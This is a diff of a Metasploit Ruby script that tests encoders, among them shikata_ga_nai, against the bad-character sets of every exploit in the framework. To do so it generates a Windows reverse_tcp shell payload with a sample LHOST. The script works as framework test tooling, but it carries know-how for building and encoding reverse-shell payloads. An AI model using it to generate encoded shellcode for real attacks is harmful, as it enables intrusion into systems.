t.spec_files = FileList['*_test.rb'] t.spec_files = FileList['*_test.rb']
end end


@ -1,5 +1,5 @@
# #
# Simple script to test a group of encoders against every exploit in the framework, # Simple script to test a group of encoders against every exploit in the framework,
# specifically for the exploits badchars, to see if a payload can be encoded. We ignore # specifically for the exploits badchars, to see if a payload can be encoded. We ignore
# the target arch/platform of the exploit as we just want to pull out real world bad chars. # the target arch/platform of the exploit as we just want to pull out real world bad chars.
# #
@ -17,101 +17,92 @@ $msf = Msf::Simple::Framework.create
EXPLOITS = $msf.exploits EXPLOITS = $msf.exploits
def print_line( message ) def print_line(message)
$stdout.puts( message ) $stdout.puts(message)
end end
def format_badchars( badchars ) def format_badchars(badchars)
str = '' str = ''
if( badchars ) if (badchars)
badchars.each_byte do | b | badchars.each_byte do |b|
str << "\\x%02X" % [ b ] str << "\\x%02X" % [ b ]
end end
end end
str str
end end
def encoder_v_payload( encoder_name, payload, verbose=false ) def encoder_v_payload(encoder_name, payload, verbose = false)
success = 0 success = 0
fail = 0 fail = 0
EXPLOITS.each_module do | name, mod | EXPLOITS.each_module do |name, mod|
exploit = mod.new exploit = mod.new
print_line( "\n#{encoder_name} v #{name} (#{ format_badchars( exploit.payload_badchars ) })" ) if verbose print_line("\n#{encoder_name} v #{name} (#{format_badchars(exploit.payload_badchars)})") if verbose
begin begin
encoder = $msf.encoders.create( encoder_name ) encoder = $msf.encoders.create(encoder_name)
raw = encoder.encode( payload, exploit.payload_badchars, nil, nil ) raw = encoder.encode(payload, exploit.payload_badchars, nil, nil)
success += 1 success += 1
rescue rescue
print_line( " FAILED! badchars=#{ format_badchars( exploit.payload_badchars ) }\n" ) if verbose print_line(" FAILED! badchars=#{format_badchars(exploit.payload_badchars)}\n") if verbose
fail += 1 fail += 1
end end
end end
return [ success, fail ] return [ success, fail ]
end end
def generate_payload( name ) def generate_payload(name)
payload = $msf.payloads.create(name)
payload = $msf.payloads.create( name )
# set options for a reverse_tcp payload # set options for a reverse_tcp payload
payload.datastore['LHOST'] = '192.168.2.1' payload.datastore['LHOST'] = '192.168.2.1'
payload.datastore['RHOST'] = '192.168.2.254' payload.datastore['RHOST'] = '192.168.2.254'
payload.datastore['RPORT'] = '5432' payload.datastore['RPORT'] = '5432'
payload.datastore['LPORT'] = '4444' payload.datastore['LPORT'] = '4444'
# set options for an exec payload # set options for an exec payload
payload.datastore['CMD'] = 'calc' payload.datastore['CMD'] = 'calc'
# set generic options # set generic options
payload.datastore['EXITFUNC'] = 'thread' payload.datastore['EXITFUNC'] = 'thread'
return payload.generate return payload.generate
end end
def run( encoders, payload_name, verbose=false ) def run(encoders, payload_name, verbose = false)
payload = generate_payload(payload_name)
payload = generate_payload( payload_name )
table = Rex::Text::Table.new( table = Rex::Text::Table.new(
'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime( "%d-%b-%Y %H:%M:%S" ), 'Header' => 'Encoder v Payload Test - ' + ::Time.new.strftime("%d-%b-%Y %H:%M:%S"),
'Indent' => 4, 'Indent' => 4,
'Columns' => [ 'Encoder Name', 'Success', 'Fail' ] 'Columns' => [ 'Encoder Name', 'Success', 'Fail' ]
) )
encoders.each do | encoder_name | encoders.each do |encoder_name|
success, fail = encoder_v_payload(encoder_name, payload, verbose)
success, fail = encoder_v_payload( encoder_name, payload, verbose )
table << [ encoder_name, success, fail ] table << [ encoder_name, success, fail ]
end end
return table return table
end end
if( $0 == __FILE__ ) if ($0 == __FILE__)
print_line( "[+] Starting.\n" ) print_line("[+] Starting.\n")
encoders = [ encoders = [
'x86/bloxor', 'x86/bloxor',
'x86/shikata_ga_nai', 'x86/shikata_ga_nai',
'x86/jmp_call_additive', 'x86/jmp_call_additive',
'x86/fnstenv_mov', 'x86/fnstenv_mov',
'x86/countdown', 'x86/countdown',
'x86/call4_dword_xor' 'x86/call4_dword_xor'
] ]
payload_name = 'windows/shell/reverse_tcp' payload_name = 'windows/shell/reverse_tcp'
verbose = false verbose = false
result_table = run( encoders, payload_name, verbose )
print_line( "\n\n#{result_table.to_s}\n\n" ) result_table = run(encoders, payload_name, verbose)
print_line( "[+] Finished.\n" ) print_line("\n\n#{result_table.to_s}\n\n")
print_line("[+] Finished.\n")
end end